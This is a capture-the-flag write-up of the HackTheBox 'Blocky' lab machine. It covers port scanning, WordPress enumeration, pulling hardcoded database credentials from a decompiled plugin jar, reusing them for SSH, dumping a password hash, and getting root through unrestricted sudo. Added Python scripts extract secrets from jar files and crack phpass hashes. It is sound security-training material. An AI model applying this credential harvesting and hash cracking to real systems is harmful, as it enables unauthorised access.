
HackTheBox Blocky Writeup

Blocky

Information Gathering

Nmap Enumeration

Quick Scan

┌──(wzwr㉿kali)-[~]
└─$ sudo nmap -sT -Pn -T4 -vv 10.10.10.37     
[sudo] password for wzwr: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-17 00:58 CDT
Initiating Parallel DNS resolution of 1 host. at 00:58
Completed Parallel DNS resolution of 1 host. at 00:58, 2.05s elapsed
Initiating Connect Scan at 00:58
Scanning 10.10.10.37 [1000 ports]
Discovered open port 21/tcp on 10.10.10.37
Discovered open port 22/tcp on 10.10.10.37
Discovered open port 80/tcp on 10.10.10.37
Completed Connect Scan at 00:58, 8.17s elapsed (1000 total ports)
Nmap scan report for 10.10.10.37
Host is up, received user-set (0.067s latency).
Scanned at 2025-04-17 00:58:25 CDT for 8s
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE  SERVICE REASON
21/tcp   open   ftp     syn-ack
22/tcp   open   ssh     syn-ack
80/tcp   open   http    syn-ack
8192/tcp closed sophos  conn-refused

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 10.24 seconds

Full Scan

┌──(wzwr㉿kali)-[~]
└─$ sudo nmap -sT -Pn -T4 -vv -p- 10.10.10.37
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-17 00:58 CDT
Initiating Parallel DNS resolution of 1 host. at 00:58
Completed Parallel DNS resolution of 1 host. at 00:58, 0.00s elapsed
Initiating Connect Scan at 00:58
Scanning 10.10.10.37 [65535 ports]
Discovered open port 22/tcp on 10.10.10.37
Discovered open port 21/tcp on 10.10.10.37
Discovered open port 80/tcp on 10.10.10.37
Connect Scan Timing: About 12.96% done; ETC: 01:02 (0:03:28 remaining)
Connect Scan Timing: About 46.70% done; ETC: 01:00 (0:01:10 remaining)
Discovered open port 25565/tcp on 10.10.10.37
Connect Scan Timing: About 67.50% done; ETC: 01:01 (0:00:52 remaining)
Completed Connect Scan at 01:01, 145.37s elapsed (65535 total ports)
Nmap scan report for 10.10.10.37
Host is up, received user-set (0.063s latency).
Scanned at 2025-04-17 00:58:47 CDT for 146s
Not shown: 65530 filtered tcp ports (no-response)
PORT      STATE  SERVICE   REASON
21/tcp    open   ftp       syn-ack
22/tcp    open   ssh       syn-ack
80/tcp    open   http      syn-ack
8192/tcp  closed sophos    conn-refused
25565/tcp open   minecraft syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 145.39 seconds

UDP Scan

┌──(wzwr㉿kali)-[~]
└─$ sudo nmap -sU -Pn -vv 10.10.10.37                                 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-17 01:02 CDT
Initiating UDP Scan at 01:02
Scanning blocky.htb (10.10.10.37) [1000 ports]
Completed UDP Scan at 01:03, 34.90s elapsed (1000 total ports)
Nmap scan report for blocky.htb (10.10.10.37)
Host is up, received user-set (0.084s latency).
Scanned at 2025-04-17 01:02:34 CDT for 35s
Not shown: 998 open|filtered udp ports (no-response)
PORT   STATE  SERVICE REASON
22/udp closed ssh     port-unreach ttl 63
80/udp closed http    port-unreach ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 34.95 seconds
           Raw packets sent: 2091 (98.692KB) | Rcvd: 7 (476B)

Minecraft Port (25565) Service and OS Scan

PORT      STATE SERVICE   REASON         VERSION
25565/tcp open  minecraft syn-ack ttl 63 Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|phone|storage-misc
Running (JUST GUESSING): Linux 3.X|4.X (90%), Crestron 2-Series (86%), Google Android 4.X (86%), HP embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/o:google:android:4.0 cpe:/h:hp:p2000_g3
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 3.16 (90%), Linux 3.16 - 4.6 (90%), Linux 3.18 (90%), Linux 3.2 - 4.9 (90%), Linux 3.8 - 3.11 (90%), Linux 4.2 (90%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.94SVN%E=4%D=4/17%OT=25565%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=68009E1D%P=aarch64-unknown-linux-gnu)
SEQ(SP=104%GCD=1%ISR=10F%TI=Z%II=I%TS=8)
OPS(O1=M542ST11NW7%O2=M542ST11NW7%O3=M542NNT11NW7%O4=M542ST11NW7%O5=M542ST11NW7%O6=M542ST11)
WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
ECN(R=Y%DF=Y%TG=40%W=7210%O=M542NNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)

Further Scan with the NSE vulners Script

PORT      STATE SERVICE   REASON         VERSION
25565/tcp open  minecraft syn-ack ttl 63 Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
| vulners: 
|   Minecraft 1.11.2: 
|       CNVD-2021-53910 9.8     https://vulners.com/cnvd/CNVD-2021-53910
|       CVE-2023-33245  8.8     https://vulners.com/cve/CVE-2023-33245
|_      CVE-2021-35054  7.5     https://vulners.com/cve/CVE-2021-35054
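
The vulners script matches on the version string nmap extracted from the banner, so each hit above still has to be confirmed against the actual server before it is relied on. The banner itself comes from the Minecraft Server List Ping: a handshake packet followed by an empty status request, answered with a JSON document. The script below is an added example for this writeup, not code from the post or from nmap; it implements that exchange so the raw JSON (version, protocol number, MOTD, player counts) can be fetched and read by hand. The sample response embedded at the bottom is constructed to mirror the values nmap printed, not a capture; `query()` does the live network call.

```python
"""Minecraft Server List Ping (SLP) client: added example for this writeup, not the
post's or nmap's code. Same handshake + status request nmap's minecraft-info probe uses."""
import json
import socket
import struct

def encode_varint(value: int) -> bytes:
    """Protocol VarInt: 7 data bits per byte, MSB set means another byte follows."""
    value &= 0xFFFFFFFF  # negatives go on the wire as 32-bit two's complement
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)
        else:
            out.append(byte)
            return bytes(out)

def decode_varint(buf: bytes, pos: int = 0):
    """Decode a VarInt at buf[pos]; returns (value, position after it)."""
    result = shift = 0
    while True:
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7
        if shift > 35:
            raise ValueError("VarInt longer than 5 bytes")

def encode_string(text: str) -> bytes:
    data = text.encode("utf-8")
    return encode_varint(len(data)) + data

def frame(packet_id: int, payload: bytes) -> bytes:
    """Wire framing: VarInt(length) + VarInt(packet id) + payload."""
    body = encode_varint(packet_id) + payload
    return encode_varint(len(body)) + body

def build_handshake(host: str, port: int) -> bytes:
    """Handshake 0x00 with next_state=1 (status); servers ignore the protocol field here."""
    payload = encode_varint(0) + encode_string(host) + struct.pack(">H", port) + encode_varint(1)
    return frame(0x00, payload)

def build_status_request() -> bytes:
    return frame(0x00, b"")

def parse_status_response(buf: bytes) -> dict:
    """Status response: VarInt length, VarInt id (must be 0), VarInt-prefixed JSON."""
    _, pos = decode_varint(buf, 0)
    packet_id, pos = decode_varint(buf, pos)
    if packet_id != 0x00:
        raise ValueError(f"unexpected packet id {packet_id:#x}")
    str_len, pos = decode_varint(buf, pos)
    return json.loads(buf[pos:pos + str_len].decode("utf-8"))

def summarise(status: dict) -> dict:
    """Reduce the status JSON to the fields nmap prints."""
    desc = status.get("description", "")
    if isinstance(desc, dict):  # description may be a chat-component object
        desc = desc.get("text", "")
    ver, players = status.get("version", {}), status.get("players", {})
    return {"version": ver.get("name"), "protocol": ver.get("protocol"),
            "motd": desc, "online": players.get("online"), "max": players.get("max")}

def _eof():
    raise ConnectionError("connection closed mid-packet")

def recv_packet(sock: socket.socket) -> bytes:
    """Read one framed packet: the VarInt length prefix, then exactly that many bytes."""
    prefix = b""
    while not prefix or prefix[-1] & 0x80:
        prefix += sock.recv(1) or _eof()
    length, _ = decode_varint(prefix)
    body = b""
    while len(body) < length:
        body += sock.recv(length - len(body)) or _eof()
    return prefix + body

def query(host: str, port: int = 25565, timeout: float = 5.0) -> dict:
    """Live SLP against host:port (network call; the offline sample below does not use it)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_handshake(host, port) + build_status_request())
        return summarise(parse_status_response(recv_packet(sock)))

# Constructed sample response mirroring the values nmap printed above (not a capture).
SAMPLE_STATUS = {"version": {"name": "1.11.2", "protocol": 127},
                 "players": {"max": 20, "online": 0},
                 "description": {"text": "A Minecraft Server"}}
SAMPLE_FRAME = frame(0x00, encode_string(json.dumps(SAMPLE_STATUS)))

if __name__ == "__main__":
    print(summarise(parse_status_response(SAMPLE_FRAME)))
    print(query("blocky.htb"))  # needs the /etc/hosts entry from the Hostname section
```

Run it against the box with `python3 slp.py` once blocky.htb resolves; everything nmap summarised on one line is in the returned dict, and anything extra the server puts in the JSON (a `modinfo` block, a favicon, a custom MOTD) is visible in the raw `parse_status_response` output.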

Hostname

Add the target to /etc/hosts so the site and its feeds resolve by name:

10.10.10.37 blocky.htb

HTTP Enumeration

The site looks like a WordPress install: the directory scan turns up wp-admin, wp-content and wp-includes, and the feeds carry a WordPress generator tag.

Gobuster Enumeration

┌──(wzwr㉿kali)-[~]
└─$ gobuster dir -u http://blocky.htb/ -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://blocky.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 294]
/.htpasswd            (Status: 403) [Size: 294]
/javascript           (Status: 301) [Size: 313] [--> http://blocky.htb/javascript/]
/phpmyadmin           (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/]
/plugins              (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/]
/server-status        (Status: 403) [Size: 298]
/wiki                 (Status: 301) [Size: 307] [--> http://blocky.htb/wiki/]
/wp-admin             (Status: 301) [Size: 311] [--> http://blocky.htb/wp-admin/]
/wp-content           (Status: 301) [Size: 313] [--> http://blocky.htb/wp-content/]
/wp-includes          (Status: 301) [Size: 314] [--> http://blocky.htb/wp-includes/]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================

Website Manual Enumeration

Comments RSS feed

<rss version="2.0">
<channel>
<title>Comments for BlockyCraft</title>
<atom:link href="http://blocky.htb/index.php/comments/feed/" rel="self" type="application/rss+xml"/>
<link>http://blocky.htb</link>
<description>Under Construction!</description>
<lastBuildDate>Thu, 17 Apr 2025 05:45:30 +0000</lastBuildDate>
<sy:updatePeriod>hourly</sy:updatePeriod>
<sy:updateFrequency>1</sy:updateFrequency>
<generator>https://wordpress.org/?v=4.8</generator>
</channel>
</rss>

The generator tag indicates WordPress 4.8.

Entries RSS feed

<rss version="2.0">
<channel>
<title>BlockyCraft</title>
<atom:link href="http://blocky.htb/index.php/feed/" rel="self" type="application/rss+xml"/>
<link>http://blocky.htb</link>
<description>Under Construction!</description>
<lastBuildDate>Mon, 03 Jul 2017 00:28:31 +0000</lastBuildDate>
<language>en-US</language>
<sy:updatePeriod>hourly</sy:updatePeriod>
<sy:updateFrequency>1</sy:updateFrequency>
<generator>https://wordpress.org/?v=4.8</generator>
<item>
<title>Welcome to BlockyCraft!</title>
<link>
http://blocky.htb/index.php/2017/07/02/welcome-to-blockycraft/
</link>
<comments>
http://blocky.htb/index.php/2017/07/02/welcome-to-blockycraft/#respond
</comments>
<pubDate>Sun, 02 Jul 2017 23:51:05 +0000</pubDate>
<dc:creator>Notch</dc:creator>
<category>Uncategorized</category>
<guid isPermaLink="false">http://192.168.2.70/?p=5</guid>
<description>
Welcome everyone. The site and server are still under construction so don&#8217;t expect too much right now! We are currently developing a wiki system for the server and a core plugin to track player stats and stuff. Lots of great stuff planned for the future 🙂
</description>
<content:encoded>
<p>Welcome everyone. The site and server are still under construction so don&#8217;t expect too much right now!</p> <p>We are currently developing a wiki system for the server and a core plugin to track player stats and stuff. Lots of great stuff planned for the future <img src="https://s.w.org/images/core/emoji/2.3/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
</content:encoded>
<wfw:commentRss>
http://blocky.htb/index.php/2017/07/02/welcome-to-blockycraft/feed/
</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
</channel>
</rss>

From the two feeds we learn:

  • Username – Notch
  • WordPress Version – 4.8

Endpoint enumeration

The /wp-includes directory is browsable and exposes the WordPress core files.

Nothing in there helps us, though…

/plugins

The /plugins directory is browsable as well, so we can download the files there and take a look. To inspect BlockyCore.jar we first have to extract it; `jar xf` is the usual tool, but `unzip` works just as well because a .jar is a zip archive.

┌──(wzwr㉿kali)-[~/Downloads]
└─$ unzip BlockyCore.jar   
Archive:  BlockyCore.jar
  inflating: META-INF/MANIFEST.MF    
  inflating: com/myfirstplugin/BlockyCore.class

Then we can try to view BlockyCore.class. It is compiled JVM bytecode rather than Java source, so we cannot read it directly; a decompiler such as jd-gui recovers the source (IDA would work too, but I'm too lazy to open my Windows VM).

┌──(wzwr㉿kali)-[~/Downloads/com/myfirstplugin]
└─$ jd-gui
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

The decompiled class hardcodes the database credentials in sqlUser and sqlPass:

package com.myfirstplugin;

public class BlockyCore {
  public String sqlHost = "localhost";
  
  public String sqlUser = "root";
  
  public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
  
  public void onServerStart() {}
  
  public void onServerStop() {}
  
  public void onPlayerJoin() {
    sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
  }
  
  public void sendMessage(String username, String message) {}
}
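
A decompiler is convenient but not required to find literals like these. String constants in a class file live in the constant pool as CONSTANT_Utf8 entries, and the ones used as actual string values (field initialisers, `ldc` operands) are referenced by CONSTANT_String entries, so walking the pool is enough to pull every hardcoded literal out of a jar. The script below is an added example for this writeup, not the post's code and not jd-gui; it parses the constant pool per the JVM specification and triages credential-looking literals. The embedded jar is constructed to echo BlockyCore's literals for an offline run (only the constant pool is present, which is all the parser reads); point it at the real BlockyCore.jar to check the output against the jd-gui listing above.

```python
"""Dump the literal strings from the .class files in a jar without a decompiler.
Added example for this writeup; not the original post's code and not jd-gui."""
import io
import re
import struct
import zipfile

# Payload size (bytes after the tag) of every fixed-width constant-pool entry (JVMS 4.4).
_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
          12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

def class_string_constants(data: bytes) -> list:
    """Return the Utf8 entries referenced by CONSTANT_String, i.e. the string literals."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    (count,) = struct.unpack(">H", data[8:10])
    pos, idx = 10, 1
    utf8, string_refs = {}, []
    while idx < count:
        tag = data[pos]
        pos += 1
        if tag == 1:                      # CONSTANT_Utf8: u2 length + bytes
            (length,) = struct.unpack(">H", data[pos:pos + 2])
            utf8[idx] = data[pos + 2:pos + 2 + length].decode("utf-8", "replace")
            pos += 2 + length
        elif tag == 8:                    # CONSTANT_String: u2 index of a Utf8 entry
            string_refs.append(struct.unpack(">H", data[pos:pos + 2])[0])
            pos += 2
        elif tag in _FIXED:
            pos += _FIXED[tag]
        else:
            raise ValueError(f"unknown constant pool tag {tag} at offset {pos - 1}")
        idx += 2 if tag in (5, 6) else 1  # Long and Double occupy two pool slots
    return [utf8[i] for i in string_refs if i in utf8]

def jar_string_constants(jar_bytes: bytes) -> dict:
    """Map every .class member of an in-memory jar to its string literals."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        return {n: class_string_constants(zf.read(n))
                for n in zf.namelist() if n.endswith(".class")}

SECRET_HINT = re.compile(r"(?i)(pass|pwd|secret|token|apikey|jdbc:|mysql)")

def flag_secrets(literals: list) -> list:
    """Heuristic triage: credential-like words or long random-looking alphanumerics."""
    return [s for s in literals
            if SECRET_HINT.search(s) or re.fullmatch(r"[A-Za-z0-9]{16,}", s)]

def _sample_class() -> bytes:
    """Constructed constant pool echoing BlockyCore's literals; not the real bytecode."""
    def utf8(s):
        b = s.encode()
        return b"\x01" + struct.pack(">H", len(b)) + b
    def string(i):
        return b"\x08" + struct.pack(">H", i)
    pool = [utf8("com/myfirstplugin/BlockyCore"), b"\x07\x00\x01",   # 1 Utf8, 2 Class->1
            utf8("localhost"), string(3),                            # 3, 4
            utf8("root"), string(5),                                 # 5, 6
            utf8("8YsqfCTnvxAUeduzjNSXe22"), string(7),              # 7, 8
            b"\x05" + bytes(8),                                      # 9 Long (slots 9-10)
            utf8("sqlPass")]                                         # 11 field name only
    return b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 52, 12) + b"".join(pool)

def _sample_jar() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("com/myfirstplugin/BlockyCore.class", _sample_class())
    return buf.getvalue()

SAMPLE_JAR = _sample_jar()

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_JAR
    for name, literals in jar_string_constants(data).items():
        print(name, "->", flag_secrets(literals) or literals)
```

Field names such as sqlPass are also Utf8 entries, but they are not referenced by a CONSTANT_String, so the function returns only the values; `strings` on the .class would show both without telling you which is which.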

That’s huge! Let's first try this password against SSH as notch: one known username and one recovered password, so this is a credential-reuse check rather than a spray.

SSH Notch Login

┌──(wzwr㉿kali)-[~/Documents/htb/blocky]
└─$ ssh notch@blocky.htb
notch@blocky.htb's password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Fri Jul  8 07:16:08 2022 from 10.10.14.29
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

notch@Blocky:~$ ls
minecraft  user.txt

Yes! The MySQL root password is also notch's SSH password, and user.txt is sitting in the home directory.


Privilege Escalation

Database Extraction

Since we know phpMyAdmin is running (/phpmyadmin from the gobuster scan), we can log in with the root credentials found in BlockyCore.jar and dump the wordpress database.

wp_users Dump

-- phpMyAdmin SQL Dump
-- version 4.5.4.1deb2ubuntu2
-- http://www.phpmyadmin.net
--
-- Host: localhost
-- Generation Time: Apr 17, 2025 at 01:52 AM
-- Server version: 5.7.18-0ubuntu0.16.04.1
-- PHP Version: 7.0.18-0ubuntu0.16.04.1

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;

--
-- Database: `wordpress`
--

-- --------------------------------------------------------

--
-- Table structure for table `wp_users`
--

CREATE TABLE `wp_users` (
  `ID` bigint(20) UNSIGNED NOT NULL,
  `user_login` varchar(60) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_pass` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_nicename` varchar(50) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_email` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_url` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT '0',
  `display_name` varchar(250) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

--
-- Dumping data for table `wp_users`
--

INSERT INTO `wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES
(1, 'Notch', '$P$BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/', 'notch', 'notch@blockcraftfake.com', '', '2017-07-02 23:49:07', '', 0, 'Notch');

--
-- Indexes for dumped tables
--

--
-- Indexes for table `wp_users`
--
ALTER TABLE `wp_users`
  ADD PRIMARY KEY (`ID`),
  ADD KEY `user_login_key` (`user_login`),
  ADD KEY `user_nicename` (`user_nicename`),
  ADD KEY `user_email` (`user_email`);

--
-- AUTO_INCREMENT for dumped tables
--

--
-- AUTO_INCREMENT for table `wp_users`
--
ALTER TABLE `wp_users`
  MODIFY `ID` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
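
The `user_pass` value is a phpass portable hash, which WordPress 4.8 uses by default: `$P$`, one cost character, an 8-character salt and 22 characters of phpass's own base64 over an MD5 chain. The cost character `B` means 2^13 = 8192 MD5 rounds per guess, which is what makes brute force in pure Python pointless; hashcat mode 400 (or john's phpass format) is the practical route if the hash is worth cracking. The code below is an added example for this writeup, not the post's code and not WordPress's own class; it parses the dumped hash, reimplements the algorithm so a candidate can be verified, and includes a small dictionary loop only to show the shape of the attack. The "correct horse" test hash it builds is constructed for the demo.

```python
"""WordPress phpass portable hash ($P$): parse, recompute, verify.
Added example for this writeup; not the post's code and not WordPress's own class.
Format: '$P$' + cost char + 8-char salt + 22 chars of custom base64 over an MD5 chain."""
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def _encode64(data: bytes, count: int) -> str:
    """phpass's unpadded base64 with its own alphabet (not RFC 4648)."""
    out, i = [], 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def parse_phpass(stored: str) -> dict:
    """Split a portable hash into cost, salt and digest ($H$ is the phpBB variant)."""
    if len(stored) != 34 or stored[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    cost_log2 = ITOA64.index(stored[3])
    if not 7 <= cost_log2 <= 30:
        raise ValueError("cost character out of range")
    return {"cost_log2": cost_log2, "iterations": 1 << cost_log2,
            "salt": stored[4:12], "digest": stored[12:]}

def phpass_hash(password: str, salt: str, cost_log2: int, prefix: str = "$P$") -> str:
    """md5(salt+pw), then 2**cost_log2 rounds of md5(prev+pw), encoded with _encode64."""
    pw = password.encode("utf-8")
    digest = hashlib.md5(salt.encode("ascii") + pw).digest()
    for _ in range(1 << cost_log2):
        digest = hashlib.md5(digest + pw).digest()
    return prefix + ITOA64[cost_log2] + salt + _encode64(digest, 16)

def phpass_check(password: str, stored: str) -> bool:
    meta = parse_phpass(stored)
    candidate = phpass_hash(password, meta["salt"], meta["cost_log2"], stored[:3])
    return hmac.compare_digest(candidate, stored)

def crack(stored: str, wordlist):
    """Dictionary attack. Far too slow in Python at cost 13 (8192 MD5 rounds per guess);
    use hashcat -m 400 or john --format=phpass for real wordlists."""
    for word in wordlist:
        if phpass_check(word, stored):
            return word
    return None

NOTCH_HASH = "$P$BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/"  # user_pass from the wp_users dump above

if __name__ == "__main__":
    print(parse_phpass(NOTCH_HASH))  # cost 'B' -> 8192 rounds, salt iVoTj899
    demo = phpass_hash("correct horse", "abcdefgh", 7)  # constructed test hash
    print(demo, phpass_check("correct horse", demo), phpass_check("wrong", demo))
```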

Sudo

We found nothing by searching on this information, so I decided to check the sudo permissions, and…

notch@Blocky:~$ sudo -l
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

Alright… notch can run any command as root, so we have finished the machine! XDD

notch@Blocky:~$ sudo ls /root
root.txt
notch@Blocky:~$ sudo cat /root/root.txt
8278e9222984f5593488a0a85e466c3f

This post is licensed under CC BY 4.0 by the author.